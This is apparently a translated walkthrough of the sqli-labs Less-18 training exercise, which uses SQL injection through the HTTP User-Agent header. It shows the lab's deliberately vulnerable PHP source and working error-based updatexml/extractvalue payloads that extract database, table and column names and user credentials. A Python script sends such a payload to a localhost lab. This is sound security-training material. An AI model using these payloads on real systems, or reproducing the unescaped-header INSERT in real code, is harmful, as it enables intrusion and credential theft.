SQL injection LESS18 (header injection + error injection)

Sign in Dumb:Dumb

Source audit

<?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);	function check_input($value)	{	if(!empty($value))		{		// truncation (see comments)		$value = substr($value,0,20);		}		// Stripslashes if magic quotes enabled		if (get_magic_quotes_gpc())			{			$value = stripslashes($value);			}		// Quote if not a number		if (!ctype_digit($value))			{			$value = "'" . mysql_real_escape_string($value) . "'";			}			else		{		$value = intval($value);		}	return $value;	}	$uagent = $_SERVER['HTTP_USER_AGENT'];	$IP = $_SERVER['REMOTE_ADDR'];	echo "<br>";	echo 'Your IP ADDRESS is: ' .$IP;	echo "<br>";	//echo 'Your User Agent is: ' .$uagent;// take the variablesif(isset($_POST['uname']) && isset($_POST['passwd']))	{	$uname = check_input($_POST['uname']);	$passwd = check_input($_POST['passwd']);		/* echo 'Your Your User name:'. $uname; echo "<br>"; echo 'Your Password:'. $passwd; echo "<br>"; echo 'Your User Agent String:'. $uagent; echo "<br>"; echo 'Your User Agent String:'. $IP; */	//logging the connection parameters to a file for analysis. 	$fp=fopen('result.txt','a');	fwrite($fp,'User Agent:'.$uname."\n");		fclose($fp);				$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";	$result1 = mysql_query($sql);	$row1 = mysql_fetch_array($result1);		if($row1)			{			echo '<font color= "#FFFF00" font size = 3 >';			$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";			mysql_query($insert);			//echo 'Your IP ADDRESS is: ' .$IP;			echo "</font>";			//echo "<br>";			echo '<font color= "#0000ff" font size = 3 >';						echo 'Your User Agent is: ' .$uagent;			echo "</font>";			echo "<br>";			print_r(mysql_error());						echo "<br><br>";			echo '<img src="../images/flag.jpg" />';			echo "<br>";						}		else			{			echo '<font color= "#0000ff" font size="3">';			//echo "Try again looser";			print_r(mysql_error());			echo "</br>";						echo "</br>";			echo '<img src="../images/slap.jpg" />';				echo "</font>";  			}	}?>

check_input function ,SQL Inject Less17( An error injection + Subquery ), Look at the last question

$value = substr($value,0,20); But this time take the first twenty characters

$uagent = $_SERVER['HTTP_USER_AGENT'];$IP = $_SERVER['REMOTE_ADDR'];

$_SERVER yes PHP One of the predefined variables , You can use it directly , It is one that contains information such as headers （header）、 route （path） And script location （script locations） Array of information .$_SERVER The elements in the array are composed of Web Server creation , But there is no guarantee that every server will provide all the elements , Some servers may ignore some , Or provide some elements that are not listed here .

$uname = check_input($_POST['uname']);$passwd = check_input($_POST['passwd']);

This time, $passwd Also added check_input function , So we can't go through passwd Conduct SQL Yes

$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";$result1 = mysql_query($sql);$row1 = mysql_fetch_array($result1);

One select Query statement , Because you have to $row1 Not empty , You can enter the following if, So we entered uname and passwd All users must exist correctly .

== Core code ==

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";mysql_query($insert);

$uagent Inserted into the database .

We control $uagent Carry out our payload

INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('' or updatexml(1, concat('#', database()), 0), 1, 1) #

So set $uagent by

' or updatexml(1, concat('#', database()), 0), 1, 1) #

Just take the back one $IP, $uname Also written dead

Of course
' and updatexml(1, concat('#', database()), 0) and '1'='1

' or updatexml(1, concat("#", (select group_concat(table_name) from information_schema.tables where table_schema="security")), 0),1,1)#

' or updatexml(1, concat("#", (select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")), 0),1,1) #

' or updatexml(1, concat("#", (select group_concat(username,password) from users)), 0),1,1) #

#coding:utf-8import requestsurl = "http://localhost/sqli-labs-master/sqli-labs-master/Less-18/"str = "flag"print("start!")key = {'uname': "admin",'passwd':"admin"}headers = {    "Host": "localhost",    "User-Agent": "'and extractvalue(1,concat('~',(select schema_name from information_schema.schemata limit 5,1),'~')) and '1'='1",                                                           ""    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",    "Accept-Encoding": "gzip, deflate",    "Content-Type": "application/x-www-form-urlencoded",    "Content-Length": "34",    "Referer": "http://localhost/sqli-labs-master/sqli-labs-master/Less-18/",    "Cookie": "Phpstorm-b508df8e=d3fe512f-f910-46f4-ac3f-7937af84827d",    "Connection": "keep-alive",    "Upgrade-Insecure-Requests": "1",    "Pragma": "no-cache",    "Cache-Control": "no-cache"}res = requests.post(url,headers = headers,data=key).textif str in res:    print("fish!")    print(res)print("end!")